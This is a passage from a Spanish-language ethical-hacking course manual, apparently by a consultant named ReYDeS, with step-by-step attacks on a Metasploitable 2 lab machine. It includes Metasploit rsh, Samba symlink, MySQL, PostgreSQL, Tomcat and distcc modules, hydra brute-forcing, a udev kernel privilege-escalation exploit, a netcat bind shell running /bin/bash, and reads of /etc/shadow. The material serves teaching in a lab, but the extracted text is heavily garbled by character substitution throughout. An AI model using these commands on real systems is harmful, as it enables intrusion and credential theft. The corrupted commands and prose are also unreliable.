0"sibilidad de adi$inar el nDer" de secuencia R)9 2Gesde cualKuier Bed3 " I9 %0""#in? 2Inclu&end"
secuestr" AB9 s"bre la red l"cal3 ent"nces 0uede ser 0"sible e$adir la autenticacin.
1inalente/ rs- es una anera sencilla de acti$ar el acces" de escritura un arc-i$" dentr" de
autenticaci"nes c"0letas ediante l"s arc-i$"s .r-"sts " r-"sts.eKui$.
msfB search rsh#login
>atching >od"les
FFFFFFFFFFFFFFFF
Name *isclos"re *ate
Ran$ *escription
---- ---------------
---- -----------
a"'iliary/scanner/rser%ices/rsh#login
normal rsh 7"thentication Ecanner
msfB "se a"'iliary/scanner/rser%ices/rsh#login
msf a"'iliaryCrsh#loginD B set R62E8E !.2.!/0.!.41
R62E8E FB !.2.!/0.!.41
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
msf a"'iliaryCrsh#loginD B set UEER#?IRE
/opt/metasploit/apps/pro/msf4/data/wordlists/rser%ices#from#"sers.t't
UEER#?IRE FB
/opt/metasploit/apps/pro/msf4/data/wordlists/rser%ices#from#"sers.t't
msf a"'iliaryCrsh#loginD B r"n
)T+ !.2.!/0.!.41:;!1 - Etarting rsh sweep
)T+ !.2.!/0.!.41:;!1 RE6 - 7ttempting rsh with "sername XrootX from XrootX
)L+ !.2.!/0.!.41:;!1U rsh XrootX from XrootX with no password.
)T+ Iommand shell session ! opened C!.2.!/0.!.40:!24 -B !.2.!/0.!.41:;!1D at
2!4-A-!! 2!:;1:!0 -;
)T+ !.2.!/0.!.41:;!1 RE6 - 7ttempting rsh with "sername XdaemonX from XrootX
)L+ !.2.!/0.!.41:;!1U rsh XdaemonX from XrootX with no password.
)T+ Iommand shell session 2 opened C!.2.!/0.!.40:!22 -B !.2.!/0.!.41:;!1D at
2!4-A-!! 2!:;1:!0 -;
)T+ !.2.!/0.!.41:;!1 RE6 - 7ttempting rsh with "sername X&inX from XrootX
)L+ !.2.!/0.!.41:;!1U rsh X&inX from XrootX with no password.
)T+ Iommand shell session 4 opened C!.2.!/0.!.40:!2! -B !.2.!/0.!.41:;!1D at
2!4-A-!! 2!:;1:!0 -;
)T+ !.2.!/0.!.41:;!1 RE6 - 7ttempting rsh with "sername Xno&odyX from XrootX
)L+ !.2.!/0.!.41:;!1U rsh Xno&odyX from XrootX with no password.
)T+ Iommand shell session 1 opened C!.2.!/0.!.40:!2 -B !.2.!/0.!.41:;!1D at
2!4-A-!! 2!:;1:!. -;
)T+ !.2.!/0.!.41:;!1 RE6 - 7ttempting rsh with "sername XLX from XrootX
)-+ Res"lt: -ermission denied.
)T+ !.2.!/0.!.41:;!1 RE6 - 7ttempting rsh with "sername XLX from XdaemonX
)-+ Res"lt: -ermission denied.
)T+ !.2.!/0.!.41:;!1 RE6 - 7ttempting rsh with "sername XLX from X&inX
)-+ Res"lt: -ermission denied.
)T+ !.2.!/0.!.41:;!1 RE6 - 7ttempting rsh with "sername XLX from Xno&odyX
)-+ Res"lt: -ermission denied.
)T+ !.2.!/0.!.41:;!1 RE6 - 7ttempting rsh with "sername XLX from XLX
)-+ Res"lt: -ermission denied.
)T+ !.2.!/0.!.41:;!1 RE6 - 7ttempting rsh with "sername XLX from Xg"estX
)-+ Res"lt: -ermission denied.
)T+ !.2.!/0.!.41:;!1 RE6 - 7ttempting rsh with "sername XLX from XmailX
)-+ Res"lt: -ermission denied.
)T+ !.2.!/0.!.41:;!1 RE6 - 7ttempting rsh with "sername Xg"estX from XrootX
)-+ Res"lt: -ermission denied.
)T+ !.2.!/0.!.41:;!1 RE6 - 7ttempting rsh with "sername Xg"estX from XdaemonX
)-+ Res"lt: -ermission denied.
)T+ !.2.!/0.!.41:;!1 RE6 - 7ttempting rsh with "sername Xg"estX from X&inX
)-+ Res"lt: -ermission denied.
)T+ !.2.!/0.!.41:;!1 RE6 - 7ttempting rsh with "sername Xg"estX from Xno&odyX
)-+ Res"lt: -ermission denied.
)T+ !.2.!/0.!.41:;!1 RE6 - 7ttempting rsh with "sername Xg"estX from XLX
)-+ Res"lt: -ermission denied.
)T+ !.2.!/0.!.41:;!1 RE6 - 7ttempting rsh with "sername Xg"estX from Xg"estX
)-+ Res"lt: -ermission denied.
)T+ !.2.!/0.!.41:;!1 RE6 - 7ttempting rsh with "sername Xg"estX from XmailX
)-+ Res"lt: -ermission denied.
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
)T+ !.2.!/0.!.41:;!1 RE6 - 7ttempting rsh with "sername XmailX from XrootX
)L+ !.2.!/0.!.41:;!1U rsh XmailX from XrootX with no password.
)T+ Iommand shell session ; opened C!.2.!/0.!.40:!!. -B !.2.!/0.!.41:;!1D at
2!4-A-!! 2!:;1:2 -;
)T+ Ecanned ! of ! hosts C![ completeD
)T+ 7"'iliary mod"le e'ec"tion completed
msf a"'iliaryCrsh#loginD B
2ulnerabilidad
%aba %&lin! Rra$eral Arbitrar& 1ile Access 2unsa#e c-ec!3
-tt0IAAc$edetails.c"Ac$e:details.0-0[t\14c$eZid\2010:0Q2N
An!lisis
(l ser$id"r %aba re"t" est= c"n#i?urad" de anera inse?ura & 0erite a un atacante re"t" a
"btener acces" de lectura " 0"sibleente de escritura a cualKuier arc-i$" s"bre el -"st a#ectad".
(s0ecialente/ si un atacante tiene una cuenta $=lida en %aba 0ara recurs" c"0artid" Kue es
escribible " -a& un recurs" escribile Kue est= c"n#i?urad" c"n una cuenta de in$itad"/ 0uede crear un
enlace siblic" utili+and" una secuencia de rec"rrid" de direct"ri" & ?anar acces" a arc-i$"s &
direct"ri"s #uera del recurs" c"0artid".
Una e50l"tacin satis#act"ria reKuiera un ser$id"r %aba c"n el 0ar=etr" ^.ide lin!s^ de#inid" a ^&es^/
el cual es el estad" 0"r de#ect".
Obtener Becurs"s c"0artid"s del Ob<eti$"
# sm&client -R 99!.2.!/0.!.41
Enter rootXs password:
7nonymo"s login s"ccessf"l
*omainF)O2RNVR2U-+ 2EF)Uni'+ Eer%erF)Eam&a 4..2-*e&ian+
Eharename 8ype Iomment
--------- ---- -------
print\ *is$ -rinter *ri%ers
tmp *is$ oh noes]
opt *is$
I-I\ I-I I-I Eer%ice Cmetasploita&le ser%er CEam&a
4..2-*e&ianDD
7*>IN\ I-I I-I Eer%ice Cmetasploita&le ser%er CEam&a
4..2-*e&ianDD
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
7nonymo"s login s"ccessf"l
*omainF)O2RNVR2U-+ 2EF)Uni'+ Eer%erF)Eam&a 4..2-*e&ian+
Eer%er Iomment
--------- -------
>E87E-R2I87SRE metasploita&le ser%er CEam&a 4..2-*e&ianD
R@*E ryds ser%er CEam&aU U&"nt"D
Oor$gro"p >aster
--------- -------
O2RNVR2U- R@*E
)"n ;etas0l"it 1rae."r!
msfB search symlin$
>atching >od"les
FFFFFFFFFFFFFFFF
Name *isclos"re *ate Ran$
*escription
---- --------------- ----
-----------
a"'iliary/admin/sm&/sam&a#symlin$#tra%ersal normal Eam&a
Eymlin$ *irectory 8ra%ersal
msfB "se a"'iliary/admin/sm&/sam&a#symlin$#tra%ersal
msf a"'iliaryCsam&a#symlin$#tra%ersalD B set R62E8 !.2.!/0.!.41
R62E8 FB !.2.!/0.!.41
msf a"'iliaryCsam&a#symlin$#tra%ersalD B set E>SE67RE tmp
E>SE67RE FB tmp
msf a"'iliaryCsam&a#symlin$#tra%ersalD B e'ploit
)T+ Ionnecting to the ser%er...
)T+ 8rying to mo"nt writea&le share XtmpX...
)T+ 8rying to lin$ XrootfsX to the root filesystem...
)T+ Now access the following share to &rowse the root filesystem:
)T+ 99!.2.!/0.!.419tmp9rootfs9
)T+ 7"'iliary mod"le e'ec"tion completed
msf a"'iliaryCsam&a#symlin$#tra%ersalD B
A-"ra desde "tra c"ns"laI
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
rootG$ali:H# sm&client //!.2.!/0.!.41/tmp/
Enter rootXs password:
7nonymo"s login s"ccessf"l
*omainF)O2RNVR2U-+ 2EF)Uni'+ Eer%erF)Eam&a 4..2-*e&ian+
sm&: 9B dir
. * 8h" W"l !! 22:4.:2 2!4
.. *R E"n >ay 2 !4:4/:!2 2!2
.IIE-"ni' *6 8h" W"l !! 2:!!:2; 2!4
;!!!.Ys%c#"p R 8h" W"l !! 2:!!:;2 2!4
.X!!-"ni' *6 8h" W"l !! 2:!!:40 2!4
.X-loc$ 6R !! 8h" W"l !! 2:!!:40 2!4
rootfs *R E"n >ay 2 !4:4/:!2 2!2
;/0.! &loc$s of si3e !4!A2. 1!.40 &loc$s a%aila&le
sm&: 9B cd rootfs9
sm&: 9rootfs9B dir
. *R E"n >ay 2 !4:4/:!2 2!2
.. *R E"n >ay 2 !4:4/:!2 2!2
initrd *R 8"e >ar !/ !A:;A:1 2!
media *R 8"e >ar !/ !A:;;:;2 2!
&in *R E"n >ay !4 22:4;:44 2!2
lostLfo"nd *R 8"e >ar !/ !A:;;:!; 2!
mnt *R Oed 7pr 20 !;:!/:;/ 2!
s&in *R E"n >ay !4 2:;1:;4 2!2
initrd.img R A.2.!04 E"n >ay !4 22:4;:;/ 2!2
home *R ?ri 7pr !/ !:!/:2 2!
li& *R E"n >ay !4 22:4;:22 2!2
"sr *R 8"e 7pr 2A 24:/:4A 2!
proc *R 8h" W"l !! 2:!!:. 2!4
root *R 8h" W"l !! 2:!!:4A 2!4
sys *R 8h" W"l !! 2:!!:! 2!4
&oot *R E"n >ay !4 22:4/:20 2!2
noh"p.o"t R /A!/ 8h" W"l !! 2:!!:40 2!4
etc *R 8h" W"l !! 2:!!:4; 2!4
de% *R 8h" W"l !! 2:!!:2/ 2!4
%mlin"3 R !.0A200 8h" 7pr ! !!:;;:1! 20
opt *R 8"e >ar !/ !A:;A:4. 2!
%ar *R E"n >ay 2 !/:4:!. 2!2
cdrom *R 8"e >ar !/ !A:;;:;! 2!
tmp * 8h" W"l !! 22:4.:2 2!4
sr% *R 8"e >ar !/ !A:;A:40 2!
;/0.! &loc$s of si3e !4!A2. 1!.40 &loc$s a%aila&le
sm&: 9rootfs9B
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Ia?en P:O. )"ne5in al recurs" c"0artid" _r""t#s_ d"nde a-"ra reside la raJ+ de ;etas0l"itable2
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
A% Atacar Contrase-as
A%$ Adi#inar Contrase-as de M3SQL
-tt0IAA....&sKl.c"A
;&%*L es un sistea de ane<" de base de dat"s relaci"nal "0en:s"urce 2BG,;%3 =s
a0liaente utili+ad". ;&%*L es una eleccin 0"0ular de base de dat"s 0ara ser utili+ad" en
a0licaci"nes .eb/ & es un c"0"nente central de la a0liaente utili+ada 0ila de s"#t.are "0en
s"urce 0ara a0licaci"nes .eb LA;9 & "tras 0ilas A;9.
Intentar autenticarse al ser$ici" ;&sKl 0r"band" l"s usuari"s & c"ntrase>as c"ntenidas en res0ecti$"s
arc-i$"s.
# msfconsole
msf B search mys=l
msf B "se a"'iliary/scanner/mys=l/mys=l#login
msf a"'iliaryCmys=l#loginD B show options
msf a"'iliaryCmys=l#loginD B set R62E8E )I-#2&Yeti%o+
msf a"'iliaryCmys=l#loginD B set UEER#?IRE /"sr/share/metasploit
framewor$/data/wordlists/"ni'#"sers.t't
msf a"'iliaryCmys=l#loginD B set -7EE#?IRE /"sr/share/metasploit-
framewor$/data/wordlists/"ni'#passwords.t't
msf a"'iliaryCmys=l#loginD Be'ploit
Intentar autenticarse al ser$ici" ;&sKl utili+and" l"s usuari"s c"ntenid"s en un arc-i$" c"" sus
c"ntrase>as.
msf a"'iliaryCmys=l#loginD B "nset -7EE#?IRE
msf a"'iliaryCmys=l#loginD B set UEER#?IRE /root/"sers#metasploit
msf a"'iliaryCmys=l#loginD B r"n
msf a"'iliaryCmys=l#loginD B &ac$
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Ia?en Q:1. (<ecucin del dul" au5iliar &sKlZl"?in.
A%) Adi#inar Contrase-as de 0ostgreSQL
-tt0IAA....0"st?resKl."r?A
9"st?re%*L/ es un sistea "0en s"urce de ane<" de base de dat"s "b<et":relaci"nal 2OBG,;%3
c"n un En#asis en la a0liabilidad & cu0liient" de est=ndares. Una $asta a&"rJa de distribuci"nes
Linu5 tienen dis0"nible 9"st?re%*L en 0aKuetes.
msf B search postgres=l
msfB "se a"'iliary/scanner/postgres/postgres#login
msf a"'iliaryCpostgres#loginD B show options
msf a"'iliaryCpostgres#loginD B set R62E8E )I-#2&Yeti%o+
msf a"'iliaryCpostgres#loginD B set UEER#?IRE /"sr/share/metasploit-
framewor$/data/wordlists/postgres#defa"lt#"ser.t't
msf a"'iliaryCpostgres#loginD B set -7EE#?IRE /"sr/share/metasploit-
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
framewor$/data/wordlists/postgres#defa"lt#pass.t't
msf a"'iliaryCpostgres#loginD B r"n
msf a"'iliaryCpostgres#loginD B &ac$
Ia?en Q:2. (<ecucin del dul" au5iliar 0"st?resZl"?in
A%, Adi#inar Contrase-as de Tomcat
-tt0IAAt"cat.a0ac-e."r?A
A0ac-e R"cat es un ser$id"r .eb "0en s"urce & c"ntened"r ser$let. R"cat i0leenta las
es0eci#icaci"nes %er$let `a$a & `a$a%er$er 9a?es 2`%93/ & 0r"0"rci"na un ent"rn" <a$a 0ur"' del
ser$id"r .eb 7RR9 0ara e<ecutar cdi?" `a$a.
msf B search tomcat
msfB "se a"'iliary/scanner/http/tomcat#mgr#login
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
msf a"'iliaryCtomcat#mgr#loginD B show options
msf a"'iliaryCtomcat#mgr#loginD B set R62E8E )I-#2&Yeti%o+
msf a"'iliaryCtomcat#mgr#loginD B set R-2R8 0!0
msf a"'iliaryCtomcat#mgr#loginD B set UEER#?IRE /"sr/share/metasploit-
framewor$/data/wordlists/tomcat#mgr#defa"lt#"sers.t't

msf a"'iliaryCtomcat#mgr#loginD B set -7EE#?IRE /"sr/share/metasploit-
framewor$/data/wordlists/tomcat#mgr#defa"lt#pass.t't
msf a"'iliaryCtomcat#mgr#loginD B e'ploit
msf a"'iliaryCtomcat#mgr#loginD B &ac$
Ia?en Q:3. (<ecucin del dul" au5iliar t"catZ?rZl"?in
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
$&% 4emostraci*n de Ex(lotaci*n B 0ost
Ex(lotaci*n
Las de"straci"nes detalladas a c"ntinuacin 0eriten re#rescar la utili+acin de al?unas
-erraientas 0resentadas en el )urs". (stas de"straci"nes sen centran en la #ase de e50l"tacin &
9"st:(50l"tacin es decir l"s 0r"ces"s un atacante reali+arJa des0uEs de l"?rar acces" al sistea
ediante la e50l"tacin de una $ulnerabilidad.
$&%$ 4emostraci*n utilizando un ex(loit local (ara escalar (ri#ilegios%
Abrir c"n V;8are 9la&er las =Kuina $irtuales de Kali Linu5 & ;ets0l"itable 2
Abrir una nue$a terinal & e<ecutar 8ire%-ar! .
(scanear t"d" el ran?" de la red
# nmap -n -sn !.2.!/0.!./21
(scane" de 9uert"s
# nmap -n --n -p- !.2.!/0.!.41 -o7 escaneo#p"ertos
)"l"ca"s l"s 0uert"s abiert"s descubiert"s a un arc-i$"I
# grep open escaneo#p"ertos.nmap : c"t -d ^ _ -f ! : c"t -d ^/_ -f ! : sed ^s/
\/U/g_ B listap"ertos
# tr -d X9nX ` listap"ertos B p"ertos
(scane" de Versi"nes
)"0iar & 0e?ar la lista de 0uert"s descubiert"s en la #ase anteri"r en el si?uiente c"and"I
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
# nmap -n --n -s< -p)p"ertos+ !.2.!/0.!.41 -o7 escaneo#%ersiones
Obtener la 7uella del %istea O0erati$"
$ nmap %n %Pn %p% %& '(2.')*.'.+,
(nueracin de Usuari"s
9r"ceder a enuerar usuari"s $=lid"s en el sistea utili+and" el 0r"t"c"l" %;, c"n na0
# nmap -n --n (script sm&-en"m-"sers -p11; !.2.!/0.!.41 -o7 escaneo#sm&
# ls -l escaneoT
%e #iltran l"s resultad"s 0ara "btener una lista de usuari"s del sistea.
# grep >E87E-R2I87SRE escaneo#sm&.nmap : c"t -d ^99_ -f 2 : c"t -d ^ _ -f ! B
"s"arios
)rac!in? de )"ntrase>as
Utili+ar 7&dra 0ara "btener la c"ntrase>a de al?un" de l"s usuari"s antes detallad"s.
# hydra -R "s"arios -e ns !.2.!/0.!.41 -t 4 ssh
6anar Acces"
A-"ra se 0r"cede a c"nectarse a ;etas0l"itable2 utili+and" el usuari" & c"ntrase>a "btenidas.
# ssh -l msfadmin !.2.!/0.!.41
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
A$eri?uar la $ersin del !ernelI
# "name -a
Veri#icar in#"racin del usuari" actual.
# whoamiZ id
(50l"tar & (le$ar 9ri$ile?i"s en el %istea
,uscar un e50l"it 0ara el !ernel
# searchsploit "de%
%"bre el (50l"itI
Linu5 Kernel 2.N UG(V a 1L1 L"cal 9ri$ile?e (scalati"n (50l"it
-tt0IAAc$e.itre."r?Ac?i:binAc$enae.c?i[nae\)V(:200Q:11PM
-tt0IAA"s$db."r?As-".A"s$dbAM3P10
ude$ anteri"r a 1.L.1 n" $eri#ica si un ensa<e Netlin! se "ri?ina desde el es0aci" del !ernel/ l" cual
0erite a l"s usuari"s l"cales ?anar 0ri$ile?i"s en$iand" un ensa<e Netlin! desde el es0aci" del
usuari".
ude$ es un ane<ad"r de dis0"siti$"s 0ara el Kernel de Linu5. 9rinci0alente/ ane<a n"d"s de
dis0"siti$"s en Ade$A. ;ane<a el direct"ri" Ade$ & t"das las acci"nes del es0aci" de usuari" cuand" se
a>aden " eliinan dis0"siti$"s.
Netlin! es una #ailia de s"c!ets utili+ad" 0ara I9). 1ue dise>ad" 0ara trans#erir in#"racin de red
$ariada entre el es0aci" del !ernel de linu5 & el es0aci" de usuari". 9"r e<e0l" "0"ute2 usa netlin!
0ara c"unciarse c "n el !ernel de linu5 desde el es0aci" de usuari".
Rrans#erir el e50l"it a ;etas0l"itable 2
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
# cp /"sr/share/e'ploitd&/platforms/lin"'/local/0;A2.c /tmp/
# cd /tmp/
# less 0;A2.c
9"ner nc a la escuc-a en ;esta0l"itable 2
\ which nc
\ nc -l -n -%% -w 4 -p AAAA B 0;A2.c
Gesde Kali Linu5 en$iar el e50l"it.
# nc -%% -n !.2.!/0.!.41 AAAA ` 0;A2.c
)"0ilar & e<ecutar el e50l"it en ;etas0l"itable
\ cc -o 0;A2 0;A2.c
(scribir l" si?uiente en el arc-i$" At0Arun3
\ nano /tmp/r"n
#]/&in/&ash
nc -n -l -p 1 -e /&in/&ash
)abiar l"s 0eris"s al arc-i$" At0ArunI
\ chmod AAA /tmp/r"n
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
,uscar el 29IG3 del 0r"ces" ude$I
\ ps a' : grep "de%
Al 29IG3 restarle 1 & e<ecutar el e50l"it
\ ./0;A2 )-I*-!+
Una s-ell se debe -aber abiert" en el 0uert" L000.
A-"ra desde Kali linu5 utili+ar nc 0ara c"nectarse al 0uert" L000.
# nc -n -%% !.2.!/0.!.41 1
id
)"and" 0ara "btener una s-ell as c"da
python -c aimport ptyZpty.spawnC^/&in/&ash_Db
9"st (50l"tacin.
,uscar las -erraientas dis0"nibles en el %istea Be"t".
# which &ash
# which c"rl
# which ftp
# which nc
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
# which nmap
# which ssh
# which telnet
# which tftp
# which wget
# which sftp
(nc"ntrar In#"racin s"bre la Bed "b<eti$".
# ifconfig
# arp
# cat /etc/hosts
# cat /etc/hosts.allow
# cat /etc/hosts.deny
# cat /etc/networ$/interfaces
Geterinar c"ne5i"nes del sistea.
# netstat -an
Veri#icar l"s 0aKuetes instalad"s en el sistea
# dp$g -l
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Visuali+ar el re0"sit"ri" de 0aKuetes.
# cat /etc/apt/so"rces.list
,uscar in#"racin s"bre l"s 0r"?raas & ser$ici"s Kue se e<ecutan al iniciar.
# r"nle%el
# ls /etc/rc2.d
,uscar =s in#"racin s"bre el sistea.
# df -h
# cd /home
# ls -oa?
# cd /
# ls -aRl?
Be$isar l"s arc-i$"s de -ist"rial & de re?istr".
# ls -l /home

# ls -la /home/msfadmin
# ls -la /home/"ser
# cat /home/"ser/.&ash#history
# ls -l /%ar/log
# tail /%ar/log/lastlog
# tail /%ar/log/messages
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Be$isar c"n#i?uraci"nes & "tr"s arc-i$"s i0"rtantes.
# cat /etc/cronta&
# cat /etc/fsta&
Be$isar l"s usuari"s & las credenciales
#\ w
# last
# lastlog
# ls -alV /root/.ssh
# cat /root/.ssh/$nown#hosts
# cat /etc/passwd
# cat /etc/shadow
V %e 0"drJa tabiEn usar `-"n R-e Bi00er 0ara r"0er' =s c"ntrase>as.
$&%) 4emostraci*n utilizando contrase-as dCbiles 3 malas con7iguraciones del
sistema%
(<ecutar 8ires-ar!
Abrir una nue$a terinal & e<ecutarI
# wireshar$ M
Gescubrir l"s -"sts en #unci"naient" utili+and" n0in? .
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
$ npin %c ' '(2.')*.'-(.'2.%'+.
Beali+ar un (scane" de 9uert"s .
# nmap -n --n -p- !.2.!/0.!;..!2. -o7 scannmap
)"l"car l"s 0uert"s abiert"s del "b<eti$"/ descubiert"s en el escane"/ a un arc-i$"I.
# grep open scanmap.nmap : c"t -d ^ _ -f ! : c"t -f ^/_ -f ! : sed ^s/\/U/g_ B
listap"ertos
# tr -d X9nX ` listap"ertos B p"ertos
O0ci"nalente 0"de"s Kuitar la c"a #inal c"nI
# sed X\s/U\//Xp"ertos
(scane" de Versi"nes
)"0iar & 0e?ar la lista de 0uert"s en el si?uiente c"and"I
# nmap --n -n -s< -p)lista de p"ertos+ !.2.!/0.!;..!2. -o7 scannmap%ersion
,uscand" el e50l"it relaci"nad" a la e<ecucin re"ta de c"and"s en un sistea utili+and" distcc.
# searchsploit distcc
(nc"ntrar el direct"ri" de e50l"itdb
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
# find / -name e'ploitd&
(ntrand" al direct"ri" e50l"itdb'
# cd /"sr/share/e'ploitd&
Visuali+ar el arc-i$".
# less plarforms/m"ltiple/remote/..!;.r&
(<ecutand" ;etas0l"it 1rae."r!
133OP I distcc Gae"n )"and (5ecuti"n
distcc es un 0r"?raa 0ara distribuir la c"nstruccin de cdi?" 2)/ )bb/Ob<eti$e ) Ob<eti$e )bb3
entre $arias =Kuinas de una red. )uand" n" es c"n#i?urad" 0ara restrin?ir el acces" al 0uert" del
ser$id"r/ 0uede 0eritir a l"s atacante re"t"s e<ecutar c"and"s arbitrari"s ediante la c"0ilacin
de traba<"s/ l"s cuales s"n e<ecutad"s 0"r el ser$id"r sin $eri#icaci"nes de aut"ri+acin.
;=s in#"racin s"bre la $ulnerabilidadI
-tt0IAAc$edetails.c"Ac$eA200L:2NPOA
-tt0IAA...."s$db."r?A133OP
(50l"tacinI
msf B search distcc
msf B info e'ploit/"ni'/misc/distcc#e'ec
msf B "se e'ploit/"ni'/misc/distcc#e'ec
msf e'ploitCdistcc#e'ecD B set R62E8 !.2.!/0.!;..!2.
msf e'ploitCdistcc#e'ecD B set -7@R27* cmd/"ni'/&ind#perl
msf e'ploitCdistcc#e'ecD B e'ploit
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Una anera de escalar 0ri$ile?i"s serJa el enc"ntrar la c"ntrase>a del usuari" r""t " de un usuari"
Kue ten?a 0eris"s 0ara e<ecutar c"and"s c"" r""t/ ediante el c"and" sud"'.A-"ra 0"de"s
intentar crac!ear' la c"ntrase>as de l"s usuari"s del sistea c"n -&dra .
daemonGmetasploita&le:/\ cat /etc/passwd
daemonGmetasploita&le:/\ cat /etc/shadow
Obtener una lista de usuari"s
daemonGmetasploita&le:/\ grep &ash /etc/passwd : c"t -d ^:_ -f ! B "s"arios
Rrans#erir el arc-i$" usuari"s' (<ecutar en Kali Linu5
# nc -n -%% -l -p AAAA B "s"arios
daemonGmetasploita&le:/\ nc -n !.2.!/0.!;..!20 AAAA ` "s"arios
Una $e+ crac!eadas' al?unas de las c"ntrase>as/ se 0r"cede a autenticarse c"n una de ellas desde
Kali Linu5 ediante el ser$ici" ss- .
# ssh -l msfadmin !.2.!/0.!;..!2.
Una $e+ dentr" del sistea 0r"cede"s a utili+ar el c"and" sud"'.
# s"do cat /etc/shadow
# s"do passwd root
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
In?resar una nue$a c"ntrase>a & lue?"
# s" root
# id
La #ase de 9"st (50l"tacin serJa siilar a la detallada en el 0rier e<e0l".
1IN.
Sitio "eb# $$$%ReYDeS%com -#- e-mail# ReYDeS&gmail%com -#- 'el()ono# *+*,-+-,- -# &Alonso.ReYDeS
Alonso Eduardo Caballero Quezada - ReYDeS
Consultor en Hacking tico & Cmuto !orense
Este curso ha sido grabado y est disponible en video.
Para descargar los videos del Curso, escribirme un e-mail: a reydes@gmail.com
1. Presentacin:
/ali 0inu1 es la nueva eneracin de la distribucin 0inu1 2ack3rack para reali4ar auditor5as de
seuridad y Pruebas de Penetracin. /ali 0inu1 es una plata!orma basada en 678/0inu1 9ebian y es
una reconstruccin completa de 2ack3rack: la cual contiene una ran cantidad de herramientas para
capturar in!ormacin: identi!icar vulnerabilidades: e1plotarlas: escalar privileios y cubrir las huellas.
;ste <urso proporciona una e1celente u5a prctica para utili4ar las herramientas ms populares que
abarcan las bases de las Pruebas de Penetracin incluidas en /ali 0inu1. =s5 mismo este curso es una
e1celente !uente de conocimiento tanto para los pro!esionales como para los novatos.
. !emario:
>ntroduccin a /ali 0inu1
#etodolo5a de una Prueba de Penetracin
#quinas ?irtuales ?ulnerables
<apturar >n!ormacin
9escubrir el &b"etivo
;numerar el &b"etivo
#apear ?ulnerabilidades
